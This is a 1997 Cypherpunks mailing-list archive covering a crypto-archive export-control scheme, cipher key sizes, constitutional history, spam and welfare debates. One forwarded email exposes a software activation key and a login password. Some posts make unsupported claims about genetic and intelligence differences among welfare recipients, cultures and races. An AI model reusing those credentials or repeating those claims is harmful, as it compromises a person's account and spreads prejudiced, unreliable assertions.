1. To provide a place for U. S. and Canadian citizens to freely and openly
exchange cryptographic information, papers, programs, etc., without fear of
government reprisals.

2. To provide a friendly central repository for cryptographic libraries,
code, and papers, thus making it easy to find and use such information.

3. To provide a reasonably high bandwith connection for North Americans.

4. To exercise "freedom of the press" and press towards a constitutional EAR.


HOW MUCH SPACE WILL THIS TAKE?

My total archive space was at about 125 megabytes, but it had been trimmed
from what I would like to have. For example, downlevel versions of software
were generally deleted, and some things that are historically and
cryptographically interesting were not carried. I forsee usage of around 500
megabytes or more in the near future if we can make room for it. The storage
need not all be at the same site, however.


HOW MUCH BANDWIDTH WOULD IT TAKE?

I'd like to see at least ISDN connectivity. I've seen as many as 425 files
downloaded in a day from the current archive. Again, the storage and loading
need not all be at the same site.


WHAT DO YOU MEAN BY NOT HAVING ALL THE STORAGE AT ONE SITE?

I envision a new plan for running the archive such that one master index page
(like the "export controlled" one at http://www.sni.net/~mpj/na) points to
hidden directories all over the continent, wherever free space can be
gleaned. The only requirements on the remote sites to maintain the "export
controlled" status would be to maintain a cron job that changed the name of
the hidden ftp directory containing the files on the same schedule and using
the same key as used at the index site. For now, http://www.sni.net/~mpj/na
can remain as the password-controlled index site. This does require a slight
change to the architecture of the "export control" system in that the
directory name would be a function of the current time (UTC) and a secret
key, instead of being truly random like it is, now. The relative loss of
security in this change is inisgnificant relative to the (obvious) weak links
of the system. (Yes, I know that it can be defeated, but I also believe that
the system complies with the EAR as well as most do, anyway.) The gain in
this approach, of course, is that the index and ftp site need not reside on
the same server, as long as the system clocks are reasonably well
synchronized (within a few minutes).

One other advantage of having several sites is that popular files can be
placed on several different servers to lower the average traffic from any one
server and to make the system more robust against failures and overloads. The
archive would still have a single point of failure (at least initially) in
the index site, but that could also be replicated fairly easily as long as
users don't mind obtaining a separate password from each index site.


WHAT REMOTE SITES DO YOU PLAN TO USE?

I've had several people make inquiries or make offers, some of which sound
better than others. I hope that this one open letter answers all of the
questions that I got. I am looking for sites that:

1. Are *nix-based (at least for now).
2. Have some free disk space and bandwidth that can be used for this cause.
3. Have GNU C++ installed (or at least are identical to a host that I have
access to that does).
4. Grant me access to a shell account and an ftp account to maintain the
site.
5. Grant me access to cron so that I can have the hidden-directory renaming
program run at the right schedule.
6. Are likely to be available for a reasonably long term.
7. Are in the USA or Canada and controlled by a U. S. or Canadian citizen.


WHAT MAKES PEOPLE THINK THAT YOU WILL GET ALL OF THESE FREE RESOURCES?

The same thing that makes me think that people will donate otherwise idle CPU
resources for the fun of cracking a DES key or factoring very large numbers.


HOW DOES THE "EXPORT CONTROL" SOFTWARE WORK?

Ahh... here is the meat of the message that keeps it on topic for coderpunks
and sci.crypt:

First of all, it is important to understand the design restraints. The EAR
states that mere posting of cryptographic software on the internet is not an
export if guests must affirm a couple of things (see the regulations) and if
there is some kind of check that the "address of the receiving computer is
verified to be in the USA." Strict compliance with the latter is impossible,
but if the guest's email address is in a domain not commonly used in the USA
and Canada (.gov, .com, .org, .edu, .mil, .net, .us, or .ca), then I suspect
the guest of lying and deny access. Naturally, this is imperfect, but it is
honestly the best I could figure out how to do on a normal ISP shell account
that gives me no CGI script access. This really boils down to the honor
system. That is OK with me if it is OK with the U. S. Government, and the way
I interpret the law, it is.

Given that, here is the process:

1. http://www.sni.net/~mpj/usa is an html form that asks 3 "magic" questions
to verify eligibility to legally access the strong cryptographic software, as
well as the guest's email address. The 3 questions all default such that the
user must change each answer to be granted access. The email address must be
correct, because the user name and password are sent back via email, not as a
web page. The "submit" button sends this data to cgiemail, an application
that Colorado SuperNet does allow me to use. This form also invites
nonqualified guests to explore most of the same data via
http://www.sni.net/~mpj/freecryp.htm (links to crypto sites outside of North
America).

2. When cgiemail gets the data from the above form, it simply formats the
data using a template I supplied and mails it to me at mpj at csn.net.

3. I have an incoming mail filter that checks for any automated messages from
cgiemail (which all have a rather long fixed hexadecimal number for a subject
line), and processes them. If the guest answered all 3 questions properly,
and the email address given doesn't "look foreign," then a form letter is
filled in with a valid user name and password and mailed to the given email
address. (There are some other checks, like limiting the email address to one
destination, etc.) Noncompliant requests are simply discarded (since the
"thank you" message from the submission form really already answered them). I
thought about a courteous denial letter, but most of the bogus submissions
also have bogus email addresses, so I decided not to do that.

4. If our guest can spell his or her email address right (among other
things), then the email message directs him or her to
http://www.sni.net/~mpj/na with a valid user name and password.

5. http://www.sni.net/~mpj/na is password protected using the security
features of the Apache web server (as slightly tweaked by Colorado SuperNet).
This is the index of the files in the archive, which are in a subdirectory of
a hidden directory with a non-obvious name.

6. The hidden directory names are changed periodically to discourage the use
or posting of a copy of the page at http://www.sni.net/~mpj/na without
password protection. The idea is that by the time the cheater posted it and
anyone found it, the hidden directory names would have changed again,
invalidating the renegade index. The index is altered on the same schedule to
the same new names by a companion program. (Right now the same program does
both tasks, using a truly random number based on the arrival times and CRCs
of all of my mail, but this would have to change in the new distributed
archive model).


IS THAT REALLY GOOD ENOUGH?

I think so. It is the best export control model that I have seen that doesn't
lock out U. S. and Canadian citizens in the U. S. A. and Canada. I saw a
little more elaborate system on a Microsoft web site for distributing some
128-bit RC2 software, but it locked me out because it didn't like the way
Colorado SuperNet registered their "whois" information. It also locked me out
from work, since SSL connections can't get past our firewall. My model is
much less likely to lock out a duly qualified guest, and it is much better
than my old "warning message only" model that I used before crypto export
regulations passed from the ITAR to the EAR.


WHAT ABOUT CRYPTO SITES OUTSIDE OF NORTH AMERICA?

Please keep them up, and be ready to mirror any information that might
suddenly become legal to export from the USA on short notice. I say this
because the EAR is being challenged in court, and it is likely that
cryptographic software export regulations may be struck down. It is also
likely that the U. S. Government may quickly move to replace those
regulations with others in a very short amount of time after the EAR is
struck down. I don't want to encourage anyone to violate currently active
regulations, however. If you have a good cryptographic software site outside
of North America, and it isn't on my list at
http://www.sni.net/~mpj/freecrypt.htm, please let me know.


WHAT IS YOUR PGP KEY?

RSA key for PGP 2.6.x: ftp://ftp.csn.net/mpj/mpjkey.asc  (mpjA)
DH/DSS key for PGP 5.0: ftp://ftp.csn.net/mpj/mpjdhkey.asc (mpj at ebible.org)
(Note that my RSA key uses mpj at csn.net for an address. That old address still
works.)

-- End of PGP signed section, PGP failed!

----- End of forwarded message from Michael Paul Johnson -----






From alexlh at xs4all.nl  Sun Aug 24 11:54:26 1997
From: alexlh at xs4all.nl (Alex Le Heux)
Date: Mon, 25 Aug 1997 02:54:26 +0800
Subject: Shooting the taggers
Message-ID: <3.0.3.32.19970824204659.007f93f0@mail.xs4all.nl>



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 22 Aug 1997 23:48:57 +0200, in list.cypherpunks you wrote:

[...]

>Here in Santa Cruz, graffiti spray-painted on the walls of businesses
is a
>big, and growing, problem. And laws require the businesses to paint
over
>the grafitti, or otherwise render it invisible, in a quick and timely
>manner. (The idea is that the grafitti is offensive to the
sensibilities of
>others, or somesuch, and that it encourages rival gangs to counter
with
>their own grafitti.)
>
>And yet can J. Random Businessman defend his property against this
>defacing? Nope. The cops say "Let us handle crimes." But they don't.
>
>There's a solution for taggers: snipers.
[...]

Grafitti is criminal (although many of us probably do things that are
'criminal' under some silly law or other), it is definately very
annoying and I wouldn't like someone spraying it on my front door, but
shooting people for it is a bit over the top I think.

Grafitti (as in writing your name on or in something that you don't
own) has existed for ages. Only since the invention of spraypaint has
it become a big problem. Technology can also provide a solution.
Surfaces can be treated so that grafitti can easily be removed. All
this of course costs money, but that is, imho, the price of being part
of a pile of millions of people, ie. a city.

Another solution, which works very well for shopfronts over here, is
to actually contract and pay a grafitti gang to spray the shops logo
or whatever on the front (or steel blinds).

Shooting people for this will probably only make them shoot back,
which will ony result in overworked morgue employees and/or high
hospital bills.

Alex

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNABxOtuYAh4dUSo/EQJk2ACbBvQib5rPa4x2wykBPZbzS/8D2ZUAoMHX
CBChEIemL4afO5M4hL7B8oJX
=8989
-----END PGP SIGNATURE-----









From jya at pipeline.com  Sun Aug 24 11:55:39 1997
From: jya at pipeline.com (John Young)
Date: Mon, 25 Aug 1997 02:55:39 +0800
Subject: National Labs Want Dole or Deal
Message-ID: <1.5.4.32.19970824183320.006850f8@pop.pipeline.com>



NYT reported yesterday on the national labs efforts to attract
commercial clients to offset declines in national security funding, 
with Sandia being featured.

   http://jya.com/sandia.htm

We've been receiving from Bill Payne, ex-Sandia cryptographer,
a series of reports and letters on what's happening to enraged
Sandia scientists and staff as the budgets decline and piddling
new missions are sought, while facing the congressional threat to 
close all the labs and the entire Department of Energy. We'll offer
one of the astute assessments shortly which describes the
bind imported managers are in to turn the labs into dog-eat-dog 
corporate sweatshops, and how the not so dumb scientists are 
learning to fuck with the heads of the hatcheters, refusing to work,
bickering, prolonging disputes, sabotaging projects, maybe/maybe 
not whispering secrets to bad people in other countries, or worst of 
all, disclosing vital national information to commercial interests, that
is, outfox management by arranging a private deal.

As the NY Times recently reported on the fearsome threats nuclear 
weapons scientists are making to keep funding coming, noting that 
the Russians are doing the same, all rather brilliantly saying: keep us 
"peacekeepers" doing the dirty work happy or suffer the consequences 
when the loyal patriotic guards go over the fence, or simpler, open the 
gates, that is sell the PAL codes, barter the diagrams, to maintain 
our "entitlement".

Yep, the Sandia manager claims that the best and brightest scientists
of the US believe that their dole should be for life. Or they are going to
get very black market ammo oriented, that's market-Oriented.

The Times editorialized today that the nation's leaders must not give
in to nuclear blackmail from its own professional nuclear blackmailers.
Yet who's going to pay the nuclear gunslingers if we don't? 

Eh, Mr. Crispin? What do you know that we don't and what will you
charge to tell?







From aba at dcs.ex.ac.uk  Sun Aug 24 12:07:52 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Mon, 25 Aug 1997 03:07:52 +0800
Subject: lack of evolutionary pressures
In-Reply-To: 
Message-ID: <199708241847.TAA01243@server.test.net>




Tim May  writes:
> Main point: The human genome is now "weighed down" with more than 7
> billion persons, a large fraction of them still capable of
> reproducing. Bluntly put, it ain't going _anywhere_, at least not
> very fast. Changes in the characteristics of a species, loosely
> speaking, "evolution," happen faster in small populations.

I can see sufficiently small populations evolving quickly because in a
small population -- say 10 monkeys -- the monkey which got run over by
a truck because it was deaf, splat, end of deaf monkey gene, if it's
the only one.

But over large numbers say 700,000 or whatever, I can't see that it
makes much difference whether it's 700,000 or 7 billion.

I would've thought at that point it's more to do with the proportion
of the population with the genetic feature in question and the
magnititude of evolutionary pressure exerted by that feature.  

Clearly environment affects this, and a large population is more
likely to be geographically dispersed, and hence less prone to sudden
adverse environmental changes.

> The tribe of hominids forced out of trees by loss of forestation in
> the Rift Zone, for example, will undergo rapid changes over a few
> hundred generations.

So if 10% of the hominids by chance have an genetic characteristic
which increases their chances of `hacking it' long enough to propogate
their genes with no trees to 90% as compared to 20% for those without
this characteristic, clearly that gene set is going to propogate
pretty damn fast.

You could get some pretty fast propogation even in a population of 7
billion.  If there were an AIDs like virus with a airborne common cold
propogation vector, and a year incubation period, and 1% of the
population had some quirky genes which just happened to make them
immune to it, well that 1% gene would propogate very quickly.

> Billions of humans in the modern era, with essentially everyone
> reaching reproductive age, will not. The human genome is like a
> supertanker being hit by tennis balls: it just won't move.

There are currently practically no physical genetic advantages which
radically affect ability to breed (apart from extreme ones which mean
near certain death).  So yes, it's stagnant from that point of view.

There are however significant pressures exerted by different cultures,
which have different genetics.  Some cultures shun the idea of birth
control, and tend to have 2 or 3 times more children than average
educated westerners.  If that statistic holds for a few generations
there will be a lot more people around from these cultures.  There are
I think enough genetic differences between european genes and arabs,
asians as an example that I think it would be reasonable to argue that
this is having an effect on the human gene pool.

It is our collective shared memes which are suffering large scale
negative evolutionary pressures.  Be socially responsible, global
warming, food shortages, have few children.  Lots of other reasons
people don't have so many children ... gets in the way of career, long
term chore, commitment etc.  Reasons for welfare recipients to breed
more welfare recipients.

> Dumb people tend to mate with other dumb people, more or less. Lots
> of reasons for this, but look around and confirm it. So, this will
> lead to an ever-broader Bell curve of intelligence, right? Nope. For
> whatever complicated reasons, the curve has essentially reached its
> "normal broadness," to invent a phrase.  Or so I think is the
> case. Certainly there are ample statistics to show this.

That's a pretty interesting result.

Intelligence is an awfully hard thing to measure.  IQ tests and SAT
scores only show you what they test, ability to score at IQ test and
SATs.

> If Adam likes children, or wants them around him for whatever
> reason, fine. But any notion that 2 or 3 or even 5 children will
> affect the genome is wishful thinking. Look at the math.

A change in cultural values, societal norms, and welfare structures
over a sustained period could start to have some effects.

(Cultural norms change -- one of my grandfathers, an englishman, was
one of 20 children -- this used to be much more common.  17 of them
made it to adult life).

> (And not even the infamous "But what if _all_ smart and educated
> people thought this way?" applies. First, what Adam or Tim or Blanc
> does about having children will not affect the decisions of
> others. Magical Thinking 101 again.

Memes propogate in meme-space also.  The meme of global warming,
potential food shortages

> >The problem is that from a purely scientific evolutionary point of
> >view, the human race is surely regressing, the masses of negative
> >evolutionary pressures are certainly pushing this way.
> 
> I doubt this in the strongest possible way.
> 
> Australia was populated by the common criminals of England, the
> louts and scoundrels and thieves and murderers. (Perhaps some
> "political prisoners," but mostly common criminals.) And yet within
> a generation or two, Australia was thriving, and today nobody would
> argue that the descendants of convicts are dumb or backward.

Likely due be a number of effects, perhaps demonstrates that
intelligence and being exported from England don't necessarily
negatively correlate.  Also perhaps intelligence isn't that strongly
based on genetics.

There probably weren't any significant average genetic differences
between the freshly exported "scoundrels" by 18th century standards as
compared to the average genetic make up of english population.

Also I did hear that Hitlers super-race of children bred for selected
traits didn't work out that well.  Perhaps the environment they were
bought up in didn't help.  

Are there any studies which demonstrate any difference in intelligence
between races even, asians, africans, chinese, europeans, red-indians
etc?

There seems to be an observable difference in business acumen between
races .. of course this could easily be explained by their society and
customs.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: <199708241900.UAA01256@server.test.net>




Bill Frantz  writes:
> At 2:43 AM -0700 8/23/97, Adam Back wrote:
> >The real problem is that the pervasive bleeding heart
> >socialist/communist welfare system mentality will ensure that you'll
> >never manage it.
> >
> >"The children" is a war cry which will ensure the continuance of state
> >funded negative evolutionary pressures.
> 
> Don't always assume that these are negative evolutionary pressures.  One of
> the hallmarks of Homo's evolutionary survival has been the ability to live
> in many niches.  Welfare is one niche, and no one should be surprised when
> organisms decide to live in an available niche.

Welfare does indeed seem to be a thriving niche.

> The question is, what happens when that niche goes away?

We get to see how well the welfare recipient adapts.  Guess we get
some real life evolutionary pressures :-)

However, I think that western countries are rich enough that there's
not really much danger of anyone starving to death.  Most of the
welfare recipients could find sufficient employment to feed themselves
if they had no other choice.

> For example, I have one friend who raised her two children (spaced
> 12 years apart) on welfare.  They are now grown and she has a job as
> a Unix sysadmin.  She obviously has the ability to move from niche
> to niche.  (And doesn't subscribe to the Protestant work ethic.)

Yeah, I'm not trying to be insensitive.  I know how to work systems
just as well as any other.  Clearly plenty of intelligent people can
make a decision to work the welfare system to their financial
advantage.

My claim was that the average welfare recipient is less intelligent
than the average non-welfare recipient.  There will be plenty of
counter examples, lazy people, people who have more interesting things
to do than work, and are happy enough with the adequate lifestyle
welfare brings.

It does seem unfair however for those who could easily obtain work to
live from the indirectly stolen assetts of those who are working for a
living.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: <199708241758.SAA01186@server.test.net>




Kent Crispin  writes:
> > "The children" is a war cry which will ensure the continuance of state
> > funded negative evolutionary pressures.
> 
> In general, I would say that you are describing a remarkably
> simplistic view of evolution.  Off the top, two things I think you are
> missing:
> 
>     - first, you make the common mistake of assuming that evolution 
>     has a purpose somehow aligned with your moral view of things

No.  Evolution is blind.  Evolution is just a word to describe the
fact that genes which result in an increased likelihood of death prior
to breeding tend to not to be passed on.

I was arguing that I think current evolutionary pressures tend to work
against the criteria for increasing intelligence.  This claim is
complicated by the fact that intelligence is hard to measure.  Lets
say we choose IQ tests for the sake of argument.  Then I'm not even
sure how secure the claim that ability to pass IQ test has a large
hereditary correlation, So I don't know whether children of parents
who both had IQ measured at > 200 necessarily have children with
higher IQ than where one parent was > 200 and the other < 200.

There are also difficulties in isolating inherited factors from
environmental factors.

Modern medicine tends I think to work against the criteria of
producing healthy specimens.  (People who would have died as children
due to hereditary defects, living on to have children thanks to
medicine.  Also people who can't breed, having medical assistance to
have children.  Caesarian sections for females with too narrow hips to
easily give birth.  Lots of other examples).

Similarly difficult to influence medical evolutionary pressures --
what're you going to do?  Give our breeding permits based on
government decided criteria?

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On 23 Aug 1997, Firebeard wrote:

> MM> The militia is different from the military force.
> 
> 	It is?  It seems to me that military force is military force,
> regardless of what uniforms it's dressed in.  I forgot that it's so
> much nicer to be shot by the New Jersey National Guard than the US
> Marine Corps.  And Washington sent in the militia only because he
> didn't have enough 'regular' troops.

The states have more control over the militia than the federal government.
Also, it is important to keep in mind, that at the time the Constitution
was ratified, the militia consisted of every able-bodied, white man between
the ages of 18 and 45.  Because the militia consisted of "ordinary" people
instead of professional soldiers, it was not seen as a risk to liberty
like a standing army, much in the same way that trial by jury is not as
dangerous to liberty as trial by a military commission.  Hamilton wrote
in Federalist #24:

"There is something so far-fetched and so extravagant in the idea of
danger to liberty from the militia, that one is at a loss whether to
treat it with gravity or with raillery... .  Where in the name of
common-sense, are our fears to end if we may not trust our sons, our
brothers, our neighbors, our fellow-citizens?  What shadow of danger
can there be from men who are daily mingling with the rest of their
countrymen... ."

> MM> The U.S. Constitution explicitly states in Article I, Section 8,
> MM> that the militia may be called forth (by the federal government)
> MM> to enforce federal law.  The army and other military forces,
> MM> however, were not given this power
> 
> 	But they were not explicitly denied it, either.

The purpose of the Constitution was not to explicitly deny certain powers
of the federal government, but to explicitly grant powers to the federal
government.  The ninth and tenth amendments make this very clear.

> MM> and were not intended to be permanent establishments, either.
> 
> 	Agreed.  Has anyone ever attempted to sue the US Army as being
> unconstitutional, given the prohibition of a standing army?

The army can only be funded for two years at a time.  Congress renews
funding every two years to the army.  The army cannot exist without
Congress' approval.  A prohibition of a "standing army" would not have
been very meaningful given that there is no clear definition of this
term.

> MM> Over a hundred years ago, the Posse Comitatus Act was passed which
> MM> forbid the military from arresting or questioning American
> MM> citizens.
> 
> 	Ah, Congress had to pass a law to ban it, eh?  Well, what
> Congress giveth, Congress can taketh away - and did.  I don't recall
> the exact law or bill, but they exempted the military from the Posse
> Comitatus Act in one of the 'War on Drugs' laws.

The "drug war" activities of the army are perfectly within the limits of
the Posse Comitatus Act.  Military officers watch out for drug
traffickers and call out law enforcement to make an arrest.  The military
cannot make any arrests themselves.  This probably violates the spirit of
the Posse Comitatus Act, but not the letter.  I'm not exactly sure of the
historical context of the Posse Comitatus Act, but I do think it was
passed in reaction to the powers the president gained during the Civil War.
Lincoln suspended the writ of habeas corpus and instituted martial law
without Congress' approval, which is almost certainly unconstitutional.
As late as 1870, some people were still being tried by military commission
even though the Civil War had already ended.  This was probably the case of
Congress reacting to an unconstitutional exercise of power on the part of
the president and the military rather than abolishing a constitutionally
protected practice.



Mark
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBNACH1izIPc7jvyFpAQGAVAgAhUybvYYQpucp9OjemQYiCxKB2k5Ijb9Z
+xsR4yIGOAp8kVSI83HvrBYZxfd7DFLrs822qzt0OBhr7AQJgiwgs89aYbKbOKk/
BixjhG3lT7ccKnuMHwwVzXcBFzGqxdBJ/FzMFxn4Q6zqwsG0xM59Gu5B+sIcX7pL
Qei7vTrN+KVYYoFTMC7wvkQk2VqTp5WRjSmPFj6Iz5slNOszKtYTlX9eriWAng3E
6rcITYQqMrkH+4fyZ5tgmsH36UxtMHHu3Avpy4VvoJe+0BeeAQOr0JWcyvmdhhif
NEy6TTvCmlqoXqSTaQenhERDE0LODZQ5Q5M9BdGLQpOzZEVMoO3Fyg==
=0gE8
-----END PGP SIGNATURE-----






From whgiii at amaranth.com  Sun Aug 24 12:52:19 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Mon, 25 Aug 1997 03:52:19 +0800
Subject: When did "Congress" become "States"?
In-Reply-To: 
Message-ID: <199708241950.OAA17639@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In , on 08/23/97 
   at 11:21 PM, Tim May  said:

>I think I'll look into look into this, as it's an interesting issue of
>just when the "Congress shall make no law" evolved into "states shall
>make no laws."

Hi,

I did some more research on 14th Amendments Test Cases. Seems that anyone
wishing to learn more about this should read the Opinion's from the
Slaughterhouse Case:

http://www2.law.cornell.edu/cgi-bin/foliocgi.exe/historic/query=[Group+83+U!2ES!2E+36!3A]!28[level+Case+Citation!3A]!7C[group+citemenu!3A]!29/doc/{@1}/hit_headings/words=4/hits_only?firsthit

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNACCno9Co1n+aLhhAQFZgAQAi1SuPfSegZNKmGzKJmXDIxPjZ4Zqd6jI
7IilSCtMeHL9dQBV0mzgj5yxblRYM+pM8KAxub9WA9dwTOS6LqpzGchzswPmCh60
mlik0djJN4ALz/W8F04kEfCS8Tk1IHFkS26YauRnqy64iOC6FnbnVuo0rd9F9K77
x7FeppZozOg=
=kKrc
-----END PGP SIGNATURE-----






From pgut001 at cs.auckland.ac.nz  Mon Aug 25 04:41:57 1997
From: pgut001 at cs.auckland.ac.nz (Peter Gutmann)
Date: Mon, 25 Aug 1997 04:41:57 -0700 (PDT)
Subject: CAST key size
Message-ID: <87250919812278@cs26.cs.auckland.ac.nz>


>Just a quick question on the keysize of the CAST algorithm. According to
>the bible of Bruce,  CAST uses a 64 bit keysize, while  in the manual of
>PGP 5.0 (page 89), Phill states that CAST uses a 128 bit keysize...
>
>Am I missing something?
 
"CAST" isn't a particular algorithm, but a design process for creating 
algorithms.  The particular CAST instantiation used in PGP 5 is either 
CAST-128 or CAST5, depending on who you ask.  Other versions of CAST abound, 
including an earlier one used by MS for unknown purposes which had a 64-bit 
key, probably the one Bruce is referring to.
 
Peter.






From money at fundsrecovery.com  Sun Aug 24 14:12:44 1997
From: money at fundsrecovery.com (money at fundsrecovery.com)
Date: Mon, 25 Aug 1997 05:12:44 +0800
Subject: You Have Over a 50% Chance of Being Owed Money!
Message-ID: <199708242058.NAA07996@cygnus.com>




ATTENTION:  This is an awareness notification from Personal Funds
Recovery, Inc.  http://www.fundsrecovery.com

We want to inform the American public about money they are owed, and
then help them get it back.  

There is over 400 billion dollars in unclaimed money in the U.S.  

More than 50% of Americans are owed a portion of this money.  

You should check to see if you are owed some of this money.

It is unclaimed money that people simply forgot about or never knew
existed.  Here are some examples: checking and savings accounts, 
stocks and bonds, IRA accounts, teacher retirement plans, union pensions,
dividends, payroll checks, insurance policies, security deposits, safety
deposit boxes, pension funds, the Social Security Administration, United
States Treasury, Internal Revenue Service, and many, many more.

Visit our web site at http://www.fundsrecovery.com and we will conduct
a search for you.  We can also perform a search for Canadians! 

P.S.  If you wish to be removed from further notifications please reply
by email and include the word remove in the subject heading.







From support at golive.com  Sun Aug 24 14:17:13 1997
From: support at golive.com (support at golive.com)
Date: Mon, 25 Aug 1997 05:17:13 +0800
Subject: GoLive CyberStudio Trial Version
Message-ID: <199708242105.OAA27167@golive2.golive.com>



Dear Fritzie,

Thank you very much for downloading the GoLive CyberStudio Trial
Version. Your activation key is:

MWT4QWF7F8WP7GJJ

We also registered you for the GoLive CyberStudio Customer Site.
Use user name "fritzie126831" and password "csbfritzie126831" to login.
You can do that at http://www.golive.com using the "Login" button.

We hope that you will have fun working with CyberStudio. If there are
any questions or problems, please do not hesitate to contact
support at golive.com.

Best regards,
GoLive Systems, Inc.






From anon at anon.efga.org  Sun Aug 24 14:39:10 1997
From: anon at anon.efga.org (Anonymous)
Date: Mon, 25 Aug 1997 05:39:10 +0800
Subject: None
Message-ID: 




Jim Choate wrote:
> I suspect that there is a certain level of misrepresentation of what
> went on during the Whiskey Rebellion (which I was aware of before
> your elucidation).  Near as I can tell Washington acted responsibly
> within the bounds of the intent and word of the Constitution.

Here's a broad outline from memory.  Some details may be in error:

During the Revolution, many people lent their money to the Continental
Congress so it could prosecute the war.  During and after the
Revolution, the credit rating of the Continental Congress dropped.

Many of these people, such as those in Western Pennsylvania, sold
their claim on the Continental Congress for nickels on the dollar,
mostly to members of the better connected financial community in New
York.

Enter the Federal Government.  After it was established, Hamilton, a
well connected member of the financial community in New York,
announced that the new Government would honor the debt of the
Continental Congress.

The people in Western Pennsylvania were not happy to have sold their
debt.

Where was the Federal government to get the money?  Why, by taxing
their whisky!  As many of these people had fought and seen their
friends and relatives die over the question of taxes and freedom, they
were less than delighted with this new development.

The financial community in New York was widely suspected of being
sympathetic to the British, which made the new policies more
upsetting.

What you would expect to happen, happened.

There was a substantial movement opposed to the Constitution.  The
Bill of Rights originated as a sweetener to appease this movement.  It
is fair to say everybody's fears have been realized.

It may not have been the worst deal ever, though.  While it caused the
Civil War, it also prevented the Europeans from playing
divide-and-conquer games with the States and made possible the most
successful foreign policy in the history of the world.

For the point of view of the skeptics see:
Storing, Herbert J. Ed. "The Anti-Federalists" Chicago:University 
of Chicago Press, 1985 (ISBN 0-226-77565-8)

Just Another Cypherpunk








From jya at pipeline.com  Sun Aug 24 15:31:50 1997
From: jya at pipeline.com (John Young)
Date: Mon, 25 Aug 1997 06:31:50 +0800
Subject: Stealth Helicopters
Message-ID: <1.5.4.32.19970824215734.006e143c@pop.pipeline.com>



DisgustedMonger wrote:

>  I was watching a 'crop' in Humbold County, CA, in the early 80's
>and was standing near the top of a hill one day when I heard a
>slight "whoosh, whoosh" for about three seconds before a helicopter
>came over the hill, scaring the living shit out of me.
>  I imagine that in the 15 or so years since then, the govt has
>managed to make them invisible, as well.

The GAO reports that the B-2 stealth bomber cannot fly in the rain,
which transforms stealth technology into junk. Moreover, the fragile 
machine needs strict atmospheric control in the hangar or its skin 
rots and delicate innards peter out, and because there are none of 
the luxurious digs overseas, the plane cannot be deployed closer to 
targets, thereby limiting its threat. The problem is apparently unsolvable 
for less than the cost of the plane itself, so they've got to be pickled 
and coddled indefinitely or thrown away.

   http://jya.com/nsiad-97-181.txt

Once armaments, tactics and strategy were battle-tested by using 
them for war, now with high-price simulation being widely deployed
to save money, it's pretty certain that the price of war games will 
eventually rise to cost exactly the same as an actual war, indeed
will make war a cheaper alternative.

What's a wonder is that GAO never finds serious fault with any of
the government programs it judiciously investigates. Instead, after 
due research, request for comments from those investigated, and
fair deliberation, the somewhat tawdry matters at hands merely 
require additional funding for fine tuning and keep the congressional 
sponsors happy to fund the programs, the watch-dogs and shrewdly 
voting taxpayers doing what needs to be done to complain and bank
their cut, short 10% for all the world's sterling leaders. 

Jeez, is this a California dream of virtual reality war games forever 
or the bleeding edge of the future set in motion at the dawn of:
making peace, making war, what's the diff so long as me and mine
never get drafted, never take the actual hit, never wake up dead?







From frogfarm at yakko.cs.wmich.edu  Sun Aug 24 17:12:25 1997
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Mon, 25 Aug 1997 08:12:25 +0800
Subject: Why Not to use PGP 5.0
Message-ID: <199708250009.UAA02186@yakko.cs.wmich.edu>



http://www.shub-internet.org/why_not_pgp_5.html






From wombat at mcfeely.bsfs.org  Sun Aug 24 17:17:53 1997
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Mon, 25 Aug 1997 08:17:53 +0800
Subject: You Have Over a 50% Chance of Being Owed Money!
In-Reply-To: <199708242058.NAA07996@cygnus.com>
Message-ID: 





On Sun, 24 Aug 1997 money at fundsrecovery.com wrote:

> 
> ATTENTION:  This is an awareness notification from Personal Funds
> Recovery, Inc.  http://www.fundsrecovery.com
> 
SNIP
> Visit our web site at http://www.fundsrecovery.com and we will conduct
> a search for you.  We can also perform a search for Canadians! 

Please let us know if you find any Canadiens. We seem to have lost one.






From whgiii at amaranth.com  Sun Aug 24 17:20:37 1997
From: whgiii at amaranth.com (William H. Geiger III)
Date: Mon, 25 Aug 1997 08:20:37 +0800
Subject: Why Not to use PGP 5.0
In-Reply-To: <199708250009.UAA02186@yakko.cs.wmich.edu>
Message-ID: <199708250016.TAA20643@mailhub.amaranth.com>



-----BEGIN PGP SIGNED MESSAGE-----

In <199708250009.UAA02186 at yakko.cs.wmich.edu>, on 08/24/97 
   at 08:09 PM, Damaged Justice  said:

>http://www.shub-internet.org/why_not_pgp_5.html


Well I went to this web page and once again nothing but FUD.

Oh well better luck next time frogfarm,

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
